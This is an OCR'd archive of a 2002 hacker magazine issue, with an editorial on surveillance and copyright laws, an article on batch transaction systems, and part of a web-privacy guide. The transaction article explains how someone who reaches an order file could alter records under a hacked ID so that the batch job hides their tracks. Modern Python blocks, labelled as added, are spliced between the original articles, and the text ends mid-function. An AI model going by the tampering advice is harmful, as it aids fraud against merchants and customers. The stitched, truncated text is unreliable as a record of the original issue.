💾 Archived View for clemat.is › saccophore › library › ezines › 2600 › 2600_19-1_djvu.txt captured on 2021-12-03 at 14:04:38.

Whatever you choose to call it, this will be the biggest hacker
conference in the States to date! With nearly 50,000 square
feet to play with, expect a variety of speakers, panels,
demonstrations, films, and a network like no other.

July 12 to 14, 2002

Hotel Pennsylvania

(Make hotel reservations at (212) 736-5000)

Admission for the entire weekend is $50
You can register online at www.2600.com or send a
check/money order by 6/15/02 to:

2600/H2K2
PO Box 752
Middle Island, NY 11953 USA

Check www.hope.net for updates!
More details on page 56




Transaction Based Systems
How to Regain Privacy on the Net
Stupid Google Tricks
Neat Stuff with Switchboard.com 11
Poor Man's 3D 12
Appletalk Security Secrets 14
The Definitive Guide to Phreak Boxes 15
The Bungee Box 21
CampusWide Wide Open 22
Idiocy in the Telcos 26
Letters 30
Creative Cable Modem Configuration 40
Fun Password Facts 42
Defeating Network Address Translation 45
NSI Abuse 46
The Threat of a Lazy Admin 47
A Script for the Right Click Suppressed 53
Retail Hardware Revisited 54
More Radio Shack Facts 55
Marketplace 56
Meetings 58


"I realize that this bill basically says you can tap someone's phone for
jaywalking, and normally I would say, 'No way.' But after what happened on
September 11th, I say screw 'em." - Dana Lee Dembrow, Democratic
member of the Maryland House of Delegates explaining her approval of a
new bill that would greatly expand the ability of authorities to monitor
e-mail and telephone traffic. Jaywalkers beware.



Editor-In-Chief
Emmanuel Goldstein

Layout and Design
ShapeShifter

Cover Concept and Photo
David A. Buchwald, Bob Hardy

Cover Design
Mike Essl

Office Manager
Tampruf

Writers: Bernie S., Billsf, Blue Whale,
Noam Chomski, Eric Corley, Dalai,
John Drake, Paul Estev, Mr. French,
Thomas Icom, Javaman, Joe630,
Kingpin, Lucky225, Kevin Mitnick,
The Prophet, David Ruderman, Seraf,
Silent Switchman, Scott Skinner,
Mr. Upsetter

Webmaster: Dominick LaTrappe

Web Assistance: Juintz, Kerry

Network Operations: CSS

Special Projects: mlc

Reinforcement: Delchi

Broadcast Coordinators: Juintz,
BluKnight, Monarch, Pete, daRonin,
Digital Mercenary

IRC Admins: Antipent, Autojack,
DaRonin, Digital Mercenary,
Porkchop, Roadie

Inspirational Music: Asobi Seksu,
Lalo Schifrin, Hal Hartley, Blackfeet

Shout Outs: Colleen Anderson,
Vinny, Jeremiah, Stafoburpofse,
Doug Thomas, Free Speech TV,
New Pacifica

2600 (ISSN 0749-3851) is published
quarterly by 2600 Enterprises Inc.
7 Strong's Lane, Setauket, NY 11733.
Second class postage permit paid at
Setauket, New York.

POSTMASTER:
Send address changes to
2600, P.O. Box 752, Middle Island,
NY 11953-0752.
Copyright (c) 2002
2600 Enterprises, Inc.

Yearly subscription: U.S. and Canada
$18 individual.
$50 corporate (U.S. funds).
Overseas - $26 individual.

corporate.


Back issues available for 1984-2001 at
$20 per year.
$25 per year overseas.

Individual issues available from 1988 on
at $5 each. $6.25 each overseas.

ADDRESS ALL SUBSCRIPTION
CORRESPONDENCE TO:
2600 Subscription Dept., P.O. Box 752,
Middle Island, NY 11953-0752
(subs@2600.com).

FOR LETTERS AND ARTICLE
SUBMISSIONS, WRITE TO:
2600 Editorial Dept., P.O. Box 99, Middle
Island, NY 11953-0099
(letters@2600.com, articles@2600.com).

2600 Office Line: 631-751-2600
2600 FAX Line: 631-474-4677


Page 4 


2600 Magazine


Time To Care


It's sometimes hard to imagine which causes more harm - corruption
or indifference. One thing is becoming clearer by the day. They're
both needed to ensure an ominous future.

What's been happening in our various governmental bodies is
shameful. With each passing day it seems there's some other
horrendous piece of legislation on its way to becoming law. Our
rights as individuals are either being wiped away to benefit some
corporate interest or being severely compromised in the name of
September 11. Either way it's a repugnant development, one which
must be fought on multiple levels by people of all backgrounds.

The Digital Millennium Copyright Act (DMCA) is something we've all
become acquainted with in recent years. Passed in 1998, the DMCA was
designed to implement treaties signed at the World Intellectual
Property Organization (WIPO) back in 1996. So far it's gotten us
sued and gagged, a Russian programmer thrown into an American prison
for writing software, and a whole host of intimidation tactics,
lawsuits, and threats sent to individuals and companies all over the
world. It is forever changing the concept of free use of technology
and it's the foundation upon which even more dangerous laws are
being built.

The Consumer Broadband and Digital Television Promotion Act
(CBDTPA), formerly the Security Systems Standards and Certification
Act (SSSCA), is but one example. It sounds consumer-friendly but
this bit of legislation is going to make the DMCA look like kid
stuff. Imagine it being illegal to disable any security technology,
regardless of the reason. Or mandatory restrictions of any feature
which could be used to copy something. Entire operating systems
could be outlawed. Computer security research will be crippled.
Technology itself could come to a screeching halt since all digital
technology will be forced to adhere to a government-mandated
standard. And we all know how long it takes any government to get a
grasp on new technology. Going analog to avoid all this nonsense
won't even be an option in many cases. Digital technology under
these rules will be mandatory. Take a look at what's happening to
analog broadcasting to see how serious they are about this.

The Copyright Arbitration Royalty Panel (CARP), another offshoot of
the DMCA, is targeting Internet radio as if it were the second
coming of Satan. The DMCA determined that Internet broadcasters must
pay a specific fee for playing commercial music online, regardless
of how badly degraded the quality is. CARP has come up with a fee
structure to enforce this which will now be decided upon by the U.S.
Copyright Office. That fee is actually based on a per song, per
listener equation which would not only bankrupt most small and
independent broadcasters, but would actually require them to keep
track of their listeners, unlike their over-the-air counterparts.
The overhead of such an operation, not to mention the privacy
concerns, will likely persuade most broadcasters to simply shut down
and let the more commercial interests take over. Of course, with
enough support, this could actually come back to haunt the recording
industry. Independent musicians alienated by the Recording Industry
of America (RIAA), not to mention many from other parts of the
globe, may unite against this act of greed and create a new
alternative sound. But who knows what new laws will spring up to
thwart such a development once it becomes a reality? It's clear that
anything seen as a threat to those who manage to acquire everything
will be quickly struck down in one way or another.

And of course we will always have gems like the Communications
Decency Act (CDA), which was overturned by the Supreme Court in 1997
as an unconstitutional attack on free speech. That led to the Child
Online Protection Act (COPA), passed in 1998, which basically
threatened to reduce the Internet to a playground for kids, imposing
severe criminal and civil penalties on providers who may have
"inappropriate material" somewhere. Despite its being struck down by
a court in 1999, more variations just keep on coming. Now it's the
Children's Internet Protection Act (CIPA), which went into effect
last year. This time libraries were targeted. Those that don't
comply with mandated blocking and filtering standards will lose
funding. And the dance continues.

There's DCS-1000 (more aptly named "Carnivore" in the past), the
mysterious FBI e-mail snooping program installed in the offices of
Internet Service Providers nationwide. And there's Magic Lantern,
another FBI project, which reportedly infiltrates a user's computer
via an e-mail attachment and then sets up monitoring software which
can capture keystrokes, thereby helping to make encryption futile.

We could even talk about the badly thought out USA Patriot Act
(which actually stands for "Uniting and Strengthening America by
Providing Appropriate Tools Required to Intercept and Obstruct
Terrorism") and all of its attacks on fundamental freedoms, not to
mention the preponderance of imitators which seek to destroy what it
is our nation stands for as some sort of way of attacking those who
want to destroy what it is our nation stands for.

It's easy to become completely overwhelmed by all of this and, as a
defense mechanism, to simply shut down and stop paying attention. In
fact, this is rather essential in order for such crazy laws to work
in the first place. Imagine what would happen if everyone realized
the threat. If everyone understood the technology. The secret that
is being kept from most is that people power does work, that
activism is effective, and that "eternal vigilance" means continuous
action, not simply quoted words.

This is where the hacker world comes in. Unlike 


Spring 2002 


Page 5 




legislators and unlike those who have become swallowed up by the
"industry," we have an understanding of the technology and the
ability and desire to communicate with others outside our world.
What better way to translate the evils of these new laws into terms
that even one's grandmother could understand?

There are many groups already involved - EFF, EPIC, the ACLU, and
more. They are all in desperate need of support. It's absolutely
vital that we help to take on this task. A look at many websites and
handouts concerning these issues shows that many quickly become lost
in legal or technical jargon that means nothing to the average
person. The result is that the actual threat never burns itself into
that person's mind and it becomes a non-issue to them from that
point on.

We can help to fix that.

This will be one of the goals at H2K2 this July. There will be many
people from outside the hacker world who will come to hear what we
have to say and who will be in a position to help us greatly if the
facts are made clear to them. We need to come up with a
comprehensive plan to fight not only what has already been proposed
and adopted, but all of the future legislation that currently only
exists in some warped lawmakers' minds. To do this, we will need to
predict how their corrupted logic will proceed and be able to
inspire those who might otherwise not care. It's going to be a long
and hard battle and the odds are already clearly against us. Can you
think of a reason not to get involved right away?



Transaction Based Systems

by StankDawg@hotmail.com

Let's jump right in to the first question: "What the hell is a
transaction based system?" Well, it's as straightforward as it
sounds. It is a system that works using transactions to process
data. Remember that interactive processing shows immediate results,
but batch processing takes more time. Transaction based systems are
exclusive to batch processing (although some systems may support
both types of access).

For example, when you go to http://store.yahoo.com/2600hacker/
(plug, plug...) or some other online shopping site, you add things
to your shopping cart and then finally go to checkout. This is where
you can see transaction processing happen. Do you think a little
bell rings somewhere in a warehouse and someone runs to get your
product right away? No, it will create a transaction that performs
several functions. First, it will send the actual order to 2600
notifying them of their obligation. It also submits a transaction to
the credit card company with details of the purchase and asks for
the payment. It updates its own system at yahoo.com with accounting
information (billing 2600 for a flat hosting fee, along with a per
transaction fee to get their "cut," plus any number of other
accounting and tax record keeping functions). While you are sitting
there looking at the "thank you for ordering" screen, all these
things have happened in the background.

So why should you care? Well now that you know exactly what
transactions are, where do you think the data in those transactions
are kept? They are transactions that process data after all, and
data doesn't normally just disappear. It is kept for tax purposes
and billing purposes as mentioned before. Everything you have ever
ordered online is maintained. Don't overlook that fact. No one
throws data away! So far, I don't know of any centralized location
where all of your purchases are kept, but [...] surely keeps records
of their own transactions. But this article is not about being
labeled or tracked by Big Brother, so I digress.

You realize what happens to your data in transaction processing and
you understand that it is stored somewhere. What good is this
information to you? Crack your knuckles and stretch because it is
time to get technical.

Transactions run on some sort of regular cycle that is determined by
each individual company. Generally, that is to run the transaction
cycle once per day (you ever seen that warning that it may take 24
hours to process your transaction?). Some companies run these
programs hourly or even more frequently, but this is stressful on a
system. While there has been a trend moving towards "live" inventory
and order processing, it is still in its infancy. Generally, all of
the orders taken at a particular site will get stored in a temporary
file in the form of transactions. These transactions have programs
behind them that decode the transaction data and tell the system
what to do with the data within. A typical (unencrypted) transaction
can be as simple as this:

Jitt rm ®dbZ'C0wD2 1 nOOlPZbWmOOAny
roadNYl-345 CCI 23456789000

If you look closely and decipher what you see, you may be able to
figure out that the key to the file appears to be my friend's email
address (this is common because it is unique and not as personal as
someone's SSN). Beyond this, you might be able to figure out that on
12/13/2002 he purchased (the letter P) two (2) products classified
as FL (flowers) which is product 01. The delivery address follows
(note that this entire transaction is made up) with the last fields
being his credit card number. This is what the system gets when you
click on that order button. Then, usually in the middle of the night
(downtime for most systems) a batch job runs that picks apart those
transactions and sends out the parts that I mentioned earlier in the
article. This is when the real work gets done and the order is truly
processed. The deduction from your account will appear the next day,
the warehouse will get the work order to process the purchase, etc.
So the question I pose to you is how would I place an order without
ever seeing the web page?

Think about that for a second before reading further. You may see
that the web is simply the interface that gathers information and
generates the transactions. It is actually the transactions, and the
programs that process these transactions, that actually do the work.
So if you could get into the transaction file yourself, you would
have direct control over the transactions. Now keep in mind that I
am only explaining how these systems work. I am not suggesting or
insinuating that you should do anything illegal with this knowledge!
You are on your own there. I am only here to inform.

If you were able to gain access to this file (this is a topic that
has been beaten to death, find your own way in), you could edit the
file to have any transaction you wanted. You could cancel your own
order, change your address, or any other number of things. You
probably realize by now that you are editing all of the records in
the entire file, not just your own. And the beauty is that in my
experience, the audit trail (the logging of who does what to the
system) happens on the interface side of the house, not the data
side. The web server logs your visit and your order, but if you edit
the file directly, it usually doesn't get logged. They assume that
general system security is keeping you away from this information.
Obviously a good company will have good security that audits both,
but in my experience it doesn't happen. You edit the file, and the
worst case I usually see is that it timestamps the edit and marks it
with the user's ID (which is unimportant if you are using a hacked
ID). It is also unimportant because one of the parts usually in the
transaction process is to sort the file and/or backup the file which
puts the job timestamp and system ID back on the file! As the
program runs, it hides your footsteps for you!

Also, there is a timing issue involved when multiple transactions
are going on. The order may be processed on an hourly cycle, but the
credit card company may only process all of its charges at the end
of the day. This is how people in the past would be able to use a
stolen credit card all day without getting caught. It wasn't until
the next day that the suspicious activity was noticed. Of course,
the credit card companies got wise to this and now are much more up
to date on their monitoring.

With all of this being said (particularly my warning that you are at
your own very high risk if you do anything illegal), I think that if
you look around each day you will see how transactions are extremely
prevalent in your everyday life. The ATM will not process your
deposit until the next business day (sometimes a manual process). A
change of address may not be reflected until 24 hours later. Listen
jerk, I paid that ticket last week, why hasn't it been cleared from
my record? Waiting on a change of grade at school before you can get
your loan? All of these can now be explained, and now, maybe you can
do something about it without waiting on someone else.
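The gap described in the article above, an audit trail kept on the interface side while the batch file itself goes unwatched, can be closed by having the order-taking tier seal every record and the batch job verify the seals before processing. This is an added example, not code from the article: the fixed-width layout, field names and key handling are assumptions, and the sample records are constructed.

```python
import hashlib
import hmac

# Hypothetical fixed-width layout (field name, width). The sample record
# printed in the article is not reproduced; these records are constructed.
LAYOUT = [("key", 24), ("date", 8), ("action", 1), ("qty", 2),
          ("category", 2), ("product", 2), ("address", 24), ("card_token", 16)]
RECORD_LEN = sum(width for _, width in LAYOUT)
TAG_LEN = 64                 # hex digits of an HMAC-SHA256 tag
GENESIS = "0" * TAG_LEN      # stands in for "previous tag" on the first record


def field_offset(name):
    """Column at which a field starts inside a record."""
    pos = 0
    for field, width in LAYOUT:
        if field == name:
            return pos
        pos += width
    raise KeyError(name)


def pack(fields):
    """Serialize a dict into one fixed-width record."""
    parts = []
    for name, width in LAYOUT:
        value = str(fields[name])
        if len(value) > width:
            raise ValueError(f"{name} longer than {width} characters")
        parts.append(value.ljust(width))
    return "".join(parts)


def parse(record):
    """Split a fixed-width record back into fields, as the batch job would."""
    if len(record) != RECORD_LEN:
        raise ValueError("record has wrong length")
    fields = {}
    for name, width in LAYOUT:
        start = field_offset(name)
        fields[name] = record[start:start + width].rstrip()
    fields["qty"] = int(fields["qty"])
    return fields


def _tag(key, prev_tag, record):
    # Chaining in the previous tag makes a removed or reordered line visible.
    data = (prev_tag + record).encode()
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def append_record(lines, key, fields):
    """Interface side: seal the record before it reaches the batch file.
    Assumption: `key` is held by the order-taking tier and the batch
    verifier, never stored next to the transaction file."""
    prev_tag = lines[-1][RECORD_LEN:] if lines else GENESIS
    record = pack(fields)
    lines.append(record + _tag(key, prev_tag, record))


def verify_file(lines, key):
    """Batch side: return the indexes of lines whose seal does not verify."""
    bad, prev_tag = [], GENESIS
    for i, line in enumerate(lines):
        record, tag = line[:RECORD_LEN], line[RECORD_LEN:]
        expected = _tag(key, prev_tag, record)
        if len(line) != RECORD_LEN + TAG_LEN or not hmac.compare_digest(
                tag.encode(), expected.encode()):
            bad.append(i)
        prev_tag = tag
    # Records dropped from the END of the file are only caught if the
    # interface side also keeps the record count or last tag elsewhere.
    return bad


def build_sample(key):
    """Three constructed orders, sealed the way the interface tier would."""
    lines = []
    orders = [("alice@example.com", 1, "1 Any Road NY 12345"),
              ("bob@example.com", 2, "22 Elm Street NY 12345"),
              ("carol@example.com", 5, "3 Oak Avenue NY 12345")]
    for who, qty, address in orders:
        append_record(lines, key, {
            "key": who, "date": "20021213", "action": "P", "qty": qty,
            "category": "FL", "product": "01", "address": address,
            "card_token": "TOK0000000000001"})
    return lines


if __name__ == "__main__":
    demo_key = b"constructed-demo-key"
    sealed = build_sample(demo_key)
    print("untouched file, bad lines:", verify_file(sealed, demo_key))
    off = field_offset("address")
    sealed[1] = sealed[1][:off] + "9 Other Street".ljust(24) + sealed[1][off + 24:]
    print("after a direct edit, bad lines:", verify_file(sealed, demo_key))
```

A batch job that refuses to run, or quarantines the flagged lines, when verify_file returns anything puts the audit on the data side as well as the interface side.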



How to Regain Privacy on the Net

by Boris Loza

You'd probably be surprised if you knew what information is
available about yourself on the Internet. Whenever you connect to
the Internet you leave a great trail of information. Do you want to
know what kind? Go to http://www.leader.ru/secure/who.html or
http://www.anonymizer.com/snoop.cgi and see.

They can find out where you've come from, your operating system,
browser type, and many other things. Besides this, many servers keep
careful records of your input into search engines, information
that's submitted in forms, your shopping habits on the Web, and
information about uploaded/downloaded files.

Who Gets This Information and How?

Some companies, such as Doubleclick, create large databases of such
information, which are used by target advertising companies or which
can be sold to any interested buyers. Have you ever wondered why
every copy of Netscape running on Microsoft Windows defaults to
home.netscape.com as a home page and the Internet Explorer browser
defaults to www.msn.com?

Another method that web sites use to track visitors is a special
feature called a cookie, which contains a small amount of
information transmitted between a web server and a browser. Cookies
can contain your username/ID, computer type, IP address, and server
location.

Ever heard of web bugs (also known as clear GIFs)? Like cookies, web
bugs are electronic tags that help web sites and advertisers track
visitors' whereabouts in cyberspace. The placement of a web bug on a
page allows the site hosting the banner ad to know your IP address
and the page that you visited. This can be further correlated to
cookie information that may be sent by your browser as part of the
request to retrieve the page. But web bugs are invisible on the page
and are much smaller, about the size of the period at the end of
this sentence. Unlike cookies, people can't see web bugs and
anti-cookie filters won't catch them.

Browsers also contain other useful data for those who know how to
make use of it, such as hit logging and GUID numbers, as used by
Microsoft's Internet Explorer. Hit logging keeps track of all of
your offline activities. When you click on a banner ad, a record is
made of how long you looked at it and what ad you clicked on, as
well as personal information stored by the IE browser. Hit logging
is also designed to "phone home" to the server that created it.

GUID numbers are randomly generated "Guaranteed Unique" or "Globally
Unique" ID numbers. It's highly unlikely that these numbers will
ever occur twice across the planet. They are the ultimate
"electronic dog tag" and can survive even if you kill the cookies
and remove the "spyware."

Since the GUID number is kept on your system, it can be requested at
any time. And since Microsoft has it on its databases - along with
your name, address, and other registration details - the potential
for creating a system that tracks your every online move is
enormous. And there's even more! Did you know that if you're on a
network, every Office 97 file you create could be traced back to
you? This is because Office 97 attaches its own permanent GUID to
everything you create. So if you send a document to your best friend
and she deletes its entire contents, replaces it with abuse about
your boss, adds a macro virus to it, renames it, and sends it to
everyone in your company, it's still got your address on it as the
originator! You can see what GUID looks like by opening any Office
97 Word file with Notepad and searching for the phrase GUID. A few
bytes later, you'll find an ID number broken up with spaces inside
two curly braces. By the way, GUID helped to capture a creator of
the Melissa virus. But that's another story.

Other applications and companies that use "spyware" and "phone home"
are RealNetworks' RealJukebox, PKZip, zBubbles, CuteFTP, and many
others. SurfMonkey is an application that's supposed to block
Internet sites inappropriate for kids, but it also keeps their
personal ID, phone number, and email address. Radiate is a company
that serves the shareware market. Popular applications such as
Go!Zilla, Free Solitaire, and GetRight come embedded with an
automated ad-serving "spyware" package created by Radiate. More than
400 different applications have this program embedded within them.

The Comet Cursor from Comet Systems is cursor software that replaces
the standard screen cursor with many funny-looking cartoon
characters that appeal to kids, such as Garfield and Pokemon. This
is free software, but while users think they're getting just a cute
cursor, in reality every time they visit any of 60,000 web sites
supporting Comet Cursor technology, it will report the user's unique
serial number back to Comet Systems. Therefore a profile of the
user's interests can be compiled, and targeted ads can be served up
to the users. (There's no such thing as a free lunch!)

In this article, we'll show what you can do to minimize, and
sometimes prevent, submitting information to the Internet on your
behalf. Even if you continue to allow it to happen, at least you'll
be aware of how they do it.

Cookies and Web Bugs

When you revisit an Internet server, your browser shares the cookie
previously installed on your hard drive, providing information that
quickly identifies you. Whenever you hit a Web site supported by
advertising, the ad server reads the cookie from your machine. The
ad server then uses your cookie to look up your profile and
determine which ad to serve to you dynamically, based on the
interests it's gleaned from your surfing activities at its member
sites. The ad server also records which advertisements you've
clicked through. The type of ad and the amount of time you've spent
at the site is also captured. Also keep in mind that cookies, the
subject of several lawsuits, are sent in clear text, in both
directions, whenever encryption isn't used.

If you use Internet Explorer on Windows 2000, you can see your
cookies by opening the Documents and Settings\[Your Profile]\Cookies
directory. The cookie folder consists of several files, each of
which is a text file containing an actual cookie value. For more
information about how Microsoft "bakes" cookies check the "Cookies
with Your Coffee" article at
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dn_voices_webmen/html/webmen052797.asp

Microsoft IE 5.0 has a lot of menu and dialog changes, but you can
still disable cookies. Go to the Tools/Internet Options/Security
menu. In there, you can choose the security level for four different
browsing conditions: Internet Sites, Local Sites, "Trusted" Sites,
and Restricted Sites. If you select "Internet", and click on Custom
Level, you'll get a dialog box where you can accept all, warn before
accepting, or reject all cookies.

Once a cookie is rejected, it is thrown out and not saved to memory
or disk. Don't forget, though, that servers will keep looking for
the cookie even if you have discarded it and may try to replace it
as you surf around. Remember also that some web sites (such as
www.hotmail.com) require cookies. You cannot log in to such websites
if you've disabled cookies.

Netscape users can also see their cookies found in the
C:\Program Files\Netscape\Users\[Your profile]\cookies.txt file.
This file consists of a block of ASCII text. Briefly, what you can
see in this file is:

Domain. The domain that created and can read the variable (such as
.google.com).

Flag. A TRUE or FALSE value indicating if all machines within a
given domain can access the variable. The browser, depending on the
value set for domain, sets this value automatically.

Path. The path within the domain for which the variable is valid.

Secure. A TRUE or FALSE value indicating if a secure connection
(like SSL) with the domain is needed to access the variable.

Expiration. The time at which the variable will expire. Time is
defined as the number of seconds since Jan 1, 1970 00:00:00 GMT
(example: 2145774284).

Name. The name of the variable.

Value. The value of the variable.

For more information about Netscape cookies, browse Netscape's
Cookie Spec located at
http://www.netscape.com/newsref/std/cookie_spec.html. For complete
cookie information refer to RFC 2109 at
http://www.rfc.net/rfc2109.html.

Note that most cookies can be accessed by all hosts in the domain
(e.g., google.com, hotmail.msn.com, etc.)!

If you want to disable cookies on Netscape go to the
Edit/Preferences/Advanced/Cookie
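The seven cookies.txt fields listed above are enough to audit a cookie jar for the properties this article warns about: domain-wide readability, transmission in clear text, and long lifetimes. This is an added example, not code from the article; it assumes the fields are tab-separated in the order listed, and the sample file and the "current time" are constructed.

```python
from datetime import datetime, timezone

# Field order as described in the article; tab separation is an assumption.
FIELDS = ("domain", "flag", "path", "secure", "expiration", "name", "value")

# Constructed sample file. The first expiration reuses the article's
# example value; the last line is deliberately damaged.
SAMPLE = (
    "# Netscape HTTP Cookie File\n"
    ".example.com\tTRUE\t/\tFALSE\t2145774284\tvisitor_id\t8f3a11c2\n"
    "shop.example.com\tFALSE\t/cart\tTRUE\t1020211200\tsession\tabc123\n"
    "this line is damaged\tTRUE\n"
)
NOW = 1017619200  # constructed "current time": 2002-04-01 00:00:00 GMT


def parse_cookies_txt(text):
    """Return one dict per well-formed cookie line; skip everything else."""
    cookies = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            continue                      # damaged or truncated line
        cookie = dict(zip(FIELDS, parts))
        try:
            cookie["expiration"] = int(cookie["expiration"])
        except ValueError:
            continue
        cookie["flag"] = cookie["flag"] == "TRUE"
        cookie["secure"] = cookie["secure"] == "TRUE"
        cookies.append(cookie)
    return cookies


def audit(cookies, now, long_lived_days=365):
    """Return (domain, name, notes) for each cookie; empty notes = nothing to flag."""
    report = []
    for c in cookies:
        notes = []
        if c["flag"]:
            notes.append("readable by every host in " + c["domain"])
        if not c["secure"]:
            notes.append("sent in clear text (no secure connection required)")
        days_left = (c["expiration"] - now) // 86400
        if days_left > long_lived_days:
            until = datetime.fromtimestamp(c["expiration"], tz=timezone.utc)
            notes.append(f"persists {days_left} more days (until {until:%Y-%m-%d})")
        report.append((c["domain"], c["name"], notes))
    return report


if __name__ == "__main__":
    for domain, name, notes in audit(parse_cookies_txt(SAMPLE), NOW):
        print(domain, name, "->", "; ".join(notes) or "nothing flagged")
```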

The web bugs, like cookies, are usually used for tracking customer
habits but are much harder to detect. A web bug is a graphic on a
web page or in an email message that's designed to monitor who's
reading the page or message. Unfortunately, this technique could be
used toward malicious ends, such as grabbing IP addresses or
installing files. The security company Security Space, in a monthly
report
(http://www.securityspace.com/s_survey/data/man.200112/webbug.html),
has identified companies that benefit from the use of web bugs,
including online advertising networks Doubleclick and Link exchange,
as well as Google and America Online.

The only way to find a web bug using the MS Internet Explorer and
Netscape browsers is to view the HTML source code of a web page and
search for IMG tags that match up with cookies stored on the user's
computer. A web bug typically has its HEIGHT and WIDTH parameters in
the IMG tag set to 1, it's loaded from a different server than the
rest of the web page, and it has an associated cookie. For example:

<img src="http://ads.msn.com/ads/ABUCHE/00742350015JY.gif?Pagegroup=BECHJ£J" width="1" height="1" border="0" alt="">

This web bug was placed on the home page by Microsoft's site
www.bcentral.com to provide "spy" information about visitors to
ads.msn.com. By the way, this site contains more than ten web bugs!

Email web bugs are also represented as 1-by-1 pixel IMG tags just
like web bugs for web pages. However, because the sender of the
message already knows your email address, they also could include
the email address in the web bug URL. The email address can be in
plain text or encrypted.

Web bugs used with emails allow the measurement of how many people
have viewed the same email message in a marketing campaign. They
help to detect whether someone has viewed a message. (People who
don't view a message are removed from the list for future mailings.)
They also help to synchronize a web browser cookie to a particular
email address, allowing a web site to know the identity of people
who come to the site at a later date.
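The manual check described above (view the source, look for IMG tags sized 1 by 1 that load from another server) and the email variant with the address carried in the URL can both be automated. This is an added example, not code from the article or from Bugnosis; the host names and HTML samples are constructed, and the "same site" test is a simplifying assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def site_of(host):
    """Crude 'same site' key: the last two DNS labels (an assumption;
    a production tool would consult the Public Suffix List)."""
    return ".".join(host.lower().split(".")[-2:])


def _is_tiny(value):
    """True for the 0- or 1-pixel sizes typical of a web bug."""
    return (value or "").strip().lower() in ("0", "1", "0px", "1px")


class WebBugFinder(HTMLParser):
    """Collects IMG tags that are 1x1 (or smaller) and served by another site.
    The article's third sign, an associated cookie, cannot be seen in the
    markup and would have to be checked against the cookie store."""

    def __init__(self, page_url=""):
        super().__init__()
        self.page_site = site_of(urlsplit(page_url).hostname or "")
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        attr = {name: (value or "") for name, value in attrs}
        src = attr.get("src", "")
        host = urlsplit(src).hostname
        if not host:
            return                        # relative URL: same server as the page
        tiny = _is_tiny(attr.get("width")) and _is_tiny(attr.get("height"))
        third_party = site_of(host) != self.page_site
        if tiny and third_party:
            self.findings.append({
                "src": src,
                "host": host,
                # Only a plain-text address can be spotted; an encrypted
                # one looks like any other opaque identifier.
                "email_in_url": bool(EMAIL_RE.search(unquote(src))),
            })


def find_web_bugs(html, page_url=""):
    """Scan a page (give its URL) or an email body (leave page_url empty,
    so every remote image counts as coming from a different server)."""
    finder = WebBugFinder(page_url)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed samples.
PAGE_URL = "http://www.shop.example.com/"
PAGE_HTML = """
<html><body>
<img src="/images/spacer.gif" width="1" height="1">
<img src="http://static.shop.example.com/px.gif" width="1" height="1">
<img src="http://banners.example.net/ad468.gif" width="468" height="60">
<img src="http://tracker.example.net/t.gif?page=home" width="1" height="1" border="0" alt="">
</body></html>
"""
MAIL_HTML = """
<p>Spring sale!</p>
<img src="http://tracker.example.net/open.gif?u=alice%40example.org" width=1 height=1>
"""

if __name__ == "__main__":
    for label, hits in (("page", find_web_bugs(PAGE_HTML, PAGE_URL)),
                        ("mail", find_web_bugs(MAIL_HTML))):
        for hit in hits:
            print(label, hit["host"], "email in URL:", hit["email_in_url"])
```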

Using web bugs also allows the sender of an email message to see
what has been written when the message is forwarded with comments to
other recipients
(http://www.privacyfoundation.org/privacywatch/report.asp?id=54&action=0).

For a demonstration of bugged email see
http://mackraz.com/trickybit/readreceipt/.

For more information, check the web bug FAQ at
http://www.eff.org/Privacy/Marketing/web_bug.html or see the web bug
gallery at http://www.bugnosis.org/examples.html. You can use a free
web bug detector plug-in for IE called Bugnosis by the Privacy
Foundation, http://www.bugnosis.org/.

Proxies, Anonymity Providing 
Servers, and Remailers 

One can remain anonymous while web surfing
by using a proxy server. A proxy acts as an
intermediary, routing communications between clients
and the rest of a network. Web proxies can hide
your IP address and allow you to stay anonymous.
If you don't use any proxy server yet, you may
choose one from a free public proxy servers list at
http://tools.rosinstrument.com/proxy. To configure
your Internet Explorer 5.0 browser to use a proxy,
go to the Tools/Internet Options/Connections
menu bar. Click on the Setup and follow the
instructions on the screen. Check the Manual Proxy
Server option and click on Next. Put the host
name of the proxy you're going to use and a port
number (provided by proxy server). To check
whether your proxy server reveals your IP address,
go to http://www.all-nettools.com/pr.htm. If you
get the message "Proxy Server Detected!", then
there's a security hole in your proxy and
information about your real IP address is listed. (In this
case, try to use another proxy.) If the message is
"Proxy Server Not Detected", everything should
be OK.
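
What a check page of this kind has to work with, as an added example (not code from the article or from all-nettools.com): the destination server only sees the request headers, so it looks for the visitor's real address and for headers a proxy adds. It generalizes the two messages above into three outcomes; the header list and sample requests are assumptions, and the addresses are documentation ranges.

```python
import ipaddress
import re

# Headers a proxy commonly adds. Via, Forwarded and X-Forwarded-For are
# widely used; Client-IP and Proxy-Connection are non-standard but seen.
PROXY_HEADERS = ("via", "forwarded", "x-forwarded-for",
                 "client-ip", "proxy-connection")

_IP_TOKEN = re.compile(r"[0-9A-Fa-f:.]{3,}")

# Constructed requests as the destination server would receive them.
REAL_IP = "192.0.2.10"
TRANSPARENT = {"Host": "www.example.org",
               "Via": "1.0 cache.isp.example",
               "X-Forwarded-For": "192.0.2.10"}
ANONYMOUS = {"Host": "www.example.org", "Via": "1.1 proxy.example"}
NO_MARKS = {"Host": "www.example.org",
            "User-Agent": "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"}
FORWARDED = {"Host": "www.example.org",
             "Forwarded": "for=192.0.2.10;proto=http;by=198.51.100.7"}


def addresses_in(value):
    """Return every IPv4/IPv6 address that appears in a header value."""
    found = set()
    for token in _IP_TOKEN.findall(value):
        # Try the token as-is, then with a trailing ":port" removed.
        for candidate in (token, token.rsplit(":", 1)[0]):
            try:
                found.add(ipaddress.ip_address(candidate))
                break
            except ValueError:
                continue
    return found


def check_proxy(headers, real_ip):
    """Classify a request: does it reveal real_ip, or only that a proxy exists?"""
    real = ipaddress.ip_address(real_ip)
    lowered = {name.lower(): value for name, value in headers.items()}
    leaking = sorted(n for n, v in lowered.items() if real in addresses_in(v))
    if leaking:
        return "real IP revealed", leaking
    proxy_marks = sorted(n for n in lowered if n in PROXY_HEADERS)
    if proxy_marks:
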